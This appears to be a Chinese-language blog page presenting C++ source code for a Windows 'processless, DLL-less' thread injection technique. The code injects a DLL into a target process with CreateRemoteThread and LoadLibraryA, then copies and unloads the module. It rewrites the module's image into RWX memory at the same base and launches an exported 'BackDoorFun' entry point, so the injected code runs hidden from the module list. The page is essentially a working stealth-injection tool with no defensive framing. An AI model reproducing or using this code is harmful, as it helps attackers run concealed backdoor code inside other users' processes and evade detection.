#include "stdafx.h" #include "windows.h" #include "stdio.h" #include "Psapi.h" #include "Tlhelp32.h" //獲得加載的DLL模塊的信息,主要包括模塊基地址和模塊大小 BOOL GetThreadInformation(DWORD ProcessID,char* Dllfullname,MODULEENTRY32 &Thread) { HANDLE hthSnapshot = NULL; // 取得指定進程的所有模塊映象. hthSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,ProcessID); if (hthSnapshot == NULL) return FALSE; // 取得所有模塊列表中的指定的模塊. BOOL bMoreMods = Module32First(hthSnapshot, &Thread); if (bMoreMods == FALSE) return FALSE; // 循環取得想要的模塊. for (;bMoreMods; bMoreMods = Module32Next(hthSnapshot, &Thread)) { if (strcmp(Thread.szExePath, Dllfullname) == 0) break; } if (strcmp(Thread.szExePath, Dllfullname) == 0) return TRUE; else return FALSE; } //調整進程權限 BOOL AdjustPrivileges(HANDLE hProcess,LPCTSTR lpPrivilegeName) { //****************************************************** //調整進程權限 //****************************************************** HANDLE hToken; TOKEN_PRIVILEGES tkp; //打開進程的權限標記 if (!::OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return FALSE; //傳入lpPrivilegeName的Luid值 if(!::LookupPrivilegeValue(NULL, lpPrivilegeName, &tkp.Privileges[0].Luid)) return FALSE; tkp.PrivilegeCount = 1; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if(!::AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0)) return FALSE; return TRUE; } //注入DLL部分 BOOL InjectRemoteProcess(HANDLE hProcess,char* Dllfullname) { //開闢虛擬空間,以便寫入DLL的完整路徑 PSTR pDllName=NULL; if((pDllName=(PSTR)::VirtualAllocEx(hProcess, NULL, strlen(Dllfullname)+1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE))==NULL) return FALSE; BOOL writecode; if((writecode=::WriteProcessMemory(hProcess, pDllName, Dllfullname, strlen(Dllfullname)+1, NULL))==0) return FALSE; //取得LoadLibrary函數在Kernel32.dll中的地址. PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle("Kernel32.dll"), "LoadLibraryA"); if (pfnThreadRtn== NULL) return FALSE; //打開遠線程 HANDLE hRemoteThread=NULL; if((hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, pDllName, //loadlibrary參數,即dll的路徑字符串在遠程進程中的地址,若是多參數則放在一個結構體中 0, NULL))==NULL) return FALSE; return TRUE; } //卸載DLL BOOL UnistallDll(HANDLE hProcess,BYTE * Address) { // 取得FreeLibrary函數在Kernel32.dll中的地址. HANDLE hThread = NULL; PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle("Kernel32.dll"), "FreeLibrary"); if (pfnThreadRtn == NULL) return FALSE; // 創建遠程線程來執行FreeLibrary函數. hThread = ::CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, Address, 0, NULL); if (hThread == NULL) return FALSE; // 等待遠程線程終止. ::WaitForSingleObject(hThread, INFINITE); // 關閉句柄. ::CloseHandle(hThread); return TRUE; } #define pid 3844 #define BackDoorFun 0x1014//DLL模塊中導出函數的地址 int main(int argc, char* argv[]) { char Dllfullname[255]; char Dllname[255]; //打開進程 HANDLE hRemoteProcess=NULL; if((hRemoteProcess=::OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid))==NULL) { printf("OpenProcess faile!!"); return 0; } BOOL Adjust=AdjustPrivileges(hRemoteProcess,SE_DEBUG_NAME); if(Adjust==FALSE) { printf("Adjust process Privileges faile!!\n"); return 0; } //獲得DLL的完整路徑 strcpy(Dllname,"dll.dll"); ::GetCurrentDirectory(255,Dllfullname); strcat(Dllfullname,"\\"); strcat(Dllfullname,Dllname); BOOL Res=InjectRemoteProcess(hRemoteProcess,Dllfullname); if(Res==FALSE) { printf("Inject Faile!!\n"); return 0; } //等待遠線程啓動,否則獲取不到插入的dll信息 ::Sleep(300); DWORD RemoteTheadAddress=0; MODULEENTRY32 Thread = {sizeof(Thread)};; RemoteTheadAddress=GetThreadInformation(pid,Dllfullname,Thread); if(RemoteTheadAddress==0) { printf("Get RemoteTheadAddress Faile!!\n"); return 0; } //分配保存DLL加載後的的緩衝區,並保存 char *buffer=new char[Thread.modBaseSize+1]; DWORD read; ::ReadProcessMemory(hRemoteProcess, Thread.modBaseAddr,//加載的DLL模塊基地址 buffer, Thread.modBaseSize,//加載的DLL代碼的大小 &read); //卸載DLL BOOL Unstall=UnistallDll(hRemoteProcess,Thread.modBaseAddr); if(Unstall==FALSE) { printf("Unistall dll Faile!!!\n"); return 0; } //重新分配虛擬內存,注意從原模塊基地址出開始分配 LPVOID Alloc; Alloc=::VirtualAllocEx(hRemoteProcess,Thread.modBaseAddr,Thread.modBaseSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(Alloc== NULL) { printf("VirtualAllocEx Failed!!\n"); return 0; } BOOL Writer;DWORD Written; Writer=::WriteProcessMemory(hRemoteProcess,Thread.modBaseAddr,buffer,Thread.modBaseSize,&Written); if(Writer==0) { printf("WriteProcessMemory Failed!!\n"); return 0; } //重新啓動新的無DLL模塊的線程中的函數 HANDLE hNewThread=NULL; if((hNewThread=::CreateRemoteThread(hRemoteProcess, NULL, 0, (PTHREAD_START_ROUTINE)(Thread.modBaseAddr+BackDoorFun),//添加到進程中的數據的基地址Thread.modBaseAddr+dll導出函數的入口點地址 NULL, //此處填寫導出函數的參數地址,爲簡單期間,本導出函數沒有參數,若有參數可用注入DLL中同樣方法寫進進程空間中 0, NULL))==NULL) { printf("CreateNewThread faile!!\n"); return 0; } return 0; }
VC++實現無進程無dll線程注射技術
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.